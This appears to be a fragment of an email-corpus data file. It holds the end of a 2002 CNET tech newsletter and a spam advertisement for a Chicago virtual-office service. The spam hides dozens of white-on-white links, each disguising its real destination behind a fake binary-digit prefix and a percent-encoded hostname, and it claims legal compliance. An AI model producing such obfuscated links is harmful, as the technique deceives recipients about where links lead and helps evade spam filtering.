 Finnish telecom equipment maker Nokia said on Thursday it expected a slight rise in handset unit sales for both itself and the industry in the third quarter versus the April-June period.
 "it will be a reasonable quarter, but it will not represent such a dramatic growth as what might have been seen in some previous years," Chief Executive Jorma Ollila told a conference call following the firm's second-quarter result.&lt;br&gt;&lt;B&gt;NOKIA CORP ADS 13.33 -5.59%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href="http://clickthru.online.com/Click?q=f0-nv_DQWgaJyOnqul2fqfAgMcXeaiR"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href="http://clickthru.online.com/Click?q=05-gDULIG8PCtWW-BdfnODtxI8fiiPR" &gt;J.P. Morgan stays cautious toward Qwest in tech notes 7/18/02 &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 Analyst Marc Crossman repeats a "market performer" rating on the telecom firm and further lowers his estimates on what he sees as continued deterioration of Qwest's local and long-distance businesses. Crossman says Qwest could violate a bank agreement by the end of this quarter if it doesn't close a significant asset sale. And he argues the firm faces a funding shortage next year that can't be satisfied by selling its eastern directories businesses alone.&lt;br&gt;&lt;B&gt;QWEST COMMUNICATIONS INTL INC 2.74 14.64% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXxiCA1b-Bd5q0_HZB17WnR"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href="http://clickthru.online.com/Click?q=30-u8NEIRrPLw7JzzY8IeOdSKzjX1iR" &gt;Dell: PC Market Slow and May Stay So &lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 The stumbling economy continues to dampen demand for personal computers and could do so for the rest of the year, Dell Computer Corp. Chief Operating Officer Kevin Rollins said on Thursday.
 Despite the slow market, No. 2 computer maker Dell is gaining market share, partly because of the recent merger of Hewlett Packard Co. and Compaq Computer Corp., Rollins told reporters after Dell's annual shareholder meeting here.&lt;br&gt;&lt;B&gt;DELL COMPUTER CORP 26.0500 -1.10% &lt;/B&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=45-fNkJIKBij62HZVL-EDvznhjonlZR"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href="http://clickthru.online.com/Click?q=5a-ahD1IP0zdKyrJDQ24YOLpk6Td6dR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/06060digidark.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
         &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
         &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=6f-3x79IOL3Y3z7Pua3RXvLF34ULXuR"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href="http://clickthru.online.com/Click?q=84-CCOyQ60FV7xU37MZsihsBSWgp7yR" &gt;Panasonic's littlest Lumix&lt;/a&gt;&lt;br /&gt;
         &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=99-4mtyQAdF8qi85N02H3f2jvrqULlR"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href="http://clickthru.online.com/Click?q=ae-jOE6QMB2ESr12aN8-mhe2RYEVu4R" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         2. &lt;a href="http://clickthru.online.com/Click?q=c3-x1yCQJLHNfhWEEfZ5znP-FdWuurR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         3. &lt;a href="http://clickthru.online.com/Click?q=d8-XW73QWLPzz2hzgimkSWreAgRDciR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         4. &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgV7qkheZ0rxv3orMjEsaQPR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
         5. &lt;a href="http://clickthru.online.com/Click?q=03-13t3I3rIIxKPmwuhKQcaLlAI6OrR" &gt;Sony Cyber Shot DSC-F707&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
         &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=18-WhdzI987phLhwGpTiMEyR1N675iR"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href="http://clickthru.online.com/Click?q=2d-OxQyIbKxNlNmhu-VdngyV7VDjSPR"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href="http://clickthru.online.com/Click?q=42-rF7cIPKGJA7DQNLpz3F7_4EMIrdR" &gt;FREE for 30 days. Click
             here!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
       &lt;p&gt;&lt;a href="http://clickthru.online.com/Click?q=57-YJIXII0aTAWe6tAF0F_wt9Q9dZuR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;br&gt;
         &lt;!-- subscription management --&gt;
         &lt;font face="ms sans serif, geneva" size="-2"&gt; The e-mail address for your
         subscription is&amp;nbsp;qqqqqqqqqq-zdnet@example.com&lt;/font&gt;&lt;/p&gt;
       &lt;p&gt;&lt;font face="ms sans serif, geneva" size="-2"&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=6c-SUY3zFPa8Qg_jwbWrwYtNHsgW9Z1xdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=81-z1IaQ-KpQsgTuo1pqfRO9R6BpKlR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=96-pjdWQtdhd9NZkmejZWSoS2P4Jm4R"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href="http://clickthru.online.com/Click?q=ac-RbKtQ0UJo8yuZwndWfGJ0kSyVjyR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c1-PIljQpW7B4rGTXjwiOPYOLipujlR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=d6-yw2KQMPMW6xh43PnOIRzw0LGkk4R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=eb-HlpoQkDTzhOe_rndo6MzbuNK5xrR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=00-4FQlI9QDB2T7LN9bgi4cHr7W6TiR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=15-mYP_IGcDl2JcJtfAV-hDEc2lRbPR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e426&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 .&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=2b-2FwYnHzypG1DIkSuISVhpWZYQ9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Chicago office base - without the office space? smbqt
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;&lt;title&gt;"Your Fully Staffed office"&lt;/title&gt;&lt;meta http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;&lt;/head&gt;&lt;body bgcolor=#003399 text=#000000 link=#FFFFFF vlink=#FFFFFF alink=#FFFFFF&gt;
 &lt;p align=center&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p align=center&gt;&amp;nbsp;&lt;/p&gt;
 &lt;table width=593 border=1 bgcolor=#FFFFFF align=center bordercolor=#BD162B&gt;
   &lt;tr&gt; 
     &lt;td width=681 bgcolor=#FFFFFF valign=top&gt; 
       &lt;div align=center&gt; 
         &lt;div align=center&gt; 
           &lt;p&gt;&lt;b&gt;&lt;font size="5" color="#003399"&gt;Your
           Fully Staffed office in Chicago is ready when you are.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
           &lt;div align="center"&gt;
             &lt;center&gt;
             &lt;table border="0" width="80%" cellspacing="0" cellpadding="0" bgcolor="#FFFFFF"&gt;
               &lt;tr&gt;
                 &lt;td width="100%"&gt;Live telephone answering with call
                   screen/announce/patch.&lt;br&gt;
                   Prestige address, phone, fax, e-mail, executive offices.&lt;br&gt;
                   Operational to serve your customers today.&lt;br&gt;
                   &lt;br&gt;
                   Chicago - Office, Inc. is the fast, easy and professional&lt;br&gt;
                   way to establish your fully flexible office base in Chicago.&lt;br&gt;
                   At a low, fixed monthly cost.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 
                   &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt; 
                   &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
                   Here&lt;/font&gt;&lt;/a&gt; 
                   &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt;&amp;nbsp;
                   &lt;table border="0" width="100%" cellspacing="0" cellpadding="0"&gt;
                     &lt;tr&gt;
                       &lt;td width="100%" bgcolor="#FFFFFF"&gt;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 
                         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%62%6C%75%65%73%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
                         Here&lt;/font&gt;&lt;/a&gt; 
                         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt; 
                         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
                         Here&lt;/font&gt;&lt;/a&gt;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Here&lt;/font&gt;&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="100%" bgcolor="#FFFFFF"&gt;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
                         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt; 
                         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%62%6C%75%65%73%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
                         Here&lt;/font&gt;&lt;/a&gt; 
                         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt;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Here&lt;/font&gt;&lt;/a&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="100%" bgcolor="#FFFFFF"&gt;
                       &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%77%77%77%2E%70%61%67%65%72%65%61%6C%6D%2E%63%6F%6D/%6f%71%64%79/%69%6E%64%65%78%2E%68%74%6D%6C"&gt;&lt;font color="#0000FF"&gt;Click
                         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#0000FF"&gt;&lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%65%73%61%6C%65%73%32%2E%63%6F%6D/%70%72%62%65%6E/%67/%67%6F%73%63%2E%68%74%6D"&gt;&amp;nbsp;&amp;nbsp;&lt;/a&gt;&amp;nbsp;&lt;/font&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;
                       &amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="100%" bgcolor="#FFFFFF"&gt;
                       &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%62%6C%75%65%73%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt;
                         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt; 
                         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
                         Here&lt;/font&gt;&lt;/a&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="100%" bgcolor="#FFFFFF"&gt;
                       &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt;
                         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%62%6C%75%65%73%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt; 
                         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
                         Here&lt;/font&gt;&lt;/a&gt;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 
                         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click Here&lt;/font&gt;&lt;/a&gt;&amp;nbsp;&lt;/td&gt;
                     &lt;/tr&gt;
                     &lt;tr&gt;
                       &lt;td width="100%"&gt;for more information and FREE brochure.&lt;/td&gt;
                     &lt;/tr&gt;
                   &lt;/table&gt;
                   &lt;p&gt;Sincerely,&lt;br&gt;
                   Chicago - Office, Inc.&lt;br&gt;
                   &lt;br&gt;
                   Karen Santini&lt;br&gt;
                   Customer Relations Manager&lt;/td&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/center&gt;
             &lt;/div&gt;
         &lt;/div&gt;
       &lt;/div&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align="center"&gt;
   &lt;center&gt;
   &lt;table border="1" width="80%" bgcolor="#FFFFFF" bordercolor="#BD162B"&gt;
     &lt;tr http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%77%77%77%2E%7A%68%65%6E%67%78%69%6E%67%2E%63%6F%6D%2E%63%6E/%42%61%6E%68%65%6E/%42%30%30%31%2E%68%74%6D&gt;
       &lt;td width="100%" bordercolor="#FFFFFF" bgcolor="#FFFFFF"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;We do purchase email lists on a regular
         basis. However, we strongly oppose the continued sending of unsolicited
         email and do not want to send email to anyone who does not wish to
         receive our special mailings
         &lt;a href="http://%31%30%31%31%30%31%31%31%30%31%31%31%31%30%31%30%31%30%31%30%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%30%30%31%30%31%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%30%30%31%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%31%30%31@%77%77%77%2E%67%74%65%72%2E%6E%65%74/%73%6D%74%68/%41%64%76%61%6E%63%65%64%45%64%75/%61%62%73%74%61%63%74/%61%62%73%74%61%63%74%30%30%31/%30%30%30%30%30%30%36%35%2E%68%74%6D Click Here"&gt;.&lt;/a&gt; If you would prefer to not receive these
         messages in the future, please&lt;/font&gt;
         &lt;table border="0" width="100%" cellspacing="0" cellpadding="0"&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;&lt;u&gt;
             &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%62%6C%75%65%73%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;  &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;&lt;u&gt;
             &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%62%6C%75%65%73%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;  &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt; &lt;u&gt;
             &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%77%77%77%2E%70%61%67%65%72%65%61%6C%6D%2E%63%6F%6D/%6f%71%64%79/%70%72%65%62%65%6E%72%2E%68%74%6D"&gt;&lt;font color="#0000FF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;  &lt;font color="#0000FF"&gt; &lt;/font&gt;&lt;u&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;  &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;&lt;u&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%62%6C%75%65%73%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;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Here&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;  &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt;&lt;u&gt;
             &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%77%77%77%2E%7A%68%65%6E%67%78%69%6E%67%2E%63%6F%6D%2E%63%6E/%42%61%6E%68%65%6E/%42%30%30%31%2E%68%74%6D"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%73%61%6F%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1101101101101010101110101010101010100110101010101010101010110101011011010101010101010101101101010101010101010101010101010101010101010101010101010101010101010101010101010101010101@%77%77%77%2E%62%6C%75%65%73%2E%72%75"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%6E%6F%74%2E%66%72%65%65%34%77%65%62%2E%6E%65%74"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;font color="#FFFFFF"&gt; &lt;/font&gt;
         &lt;a href="http://1010110111011110101010101110101010101010101011010101010101010101101011010101010101010101010110101010101010101100010110111010101010100011010101101010101101@%77%77%77%2E%67%74%65%72%2E%6E%65%74/%73%6D%74%68/%41%64%76%61%6E%63%65%64%45%64%75/%61%62%73%74%61%63%74/%61%62%73%74%61%63%74%30%30%31/%30%30%30%30%30%30%36%35%2E%68%74%6D"&gt;&lt;font color="#FFFFFF"&gt;Click
         Here&lt;/font&gt;&lt;/a&gt;&lt;/u&gt;  &lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td width="100%" bgcolor="#FFFFFF" bordercolor="#FFFFFF"&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" size="1"&gt; We practice responsible mailing by honoring all
         remove requests and following all U.S. laws
         &lt;a href="http://%31%30%31%31%30%31%31%31%30%31%31%31%31%30%31%30%31%30%31%30%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%30%31%31%30%30%30%31%30%31%31%30%31%31%31%30%31%30%31%30%31%30%31%30%31%30%30%30%31%31%30%31%30%31%30%31%31%30%31%30%31%30%31%30%31%31%30%31@%77%77%77%2E%67%74%65%72%2E%6E%65%74/%73%6D%74%68/%41%64%76%61%6E%63%65%64%45%64%75/%61%62%73%74%61%63%74/%61%62%73%74%61%63%74%30%30%31/%30%30%30%30%30%30%36%35%2E%68%74%6D Click Here"&gt;.&lt;/a&gt; We are in compliance with
         all state and Federal Laws regarding commercial email solicitations
